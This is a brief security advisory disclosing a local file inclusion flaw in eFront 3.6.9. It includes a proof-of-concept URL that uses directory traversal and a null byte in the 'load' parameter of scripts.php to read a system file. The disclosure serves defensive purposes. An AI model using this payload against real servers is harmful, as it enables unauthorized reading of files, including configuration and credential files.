------------------------------------------------------------------------ Software................eFront 3.6.9 build 10653 Vulnerability...........Local File Inclusion Threat Level............Critical (4/5) Download................http://www.efrontlearning.net/ Discovery Date..........5/12/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --Description-- A local file inclusion vulnerability in eFront 3.6.9 build 10653 can be exploited to include arbitrary files. --PoC-- http://localhost/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00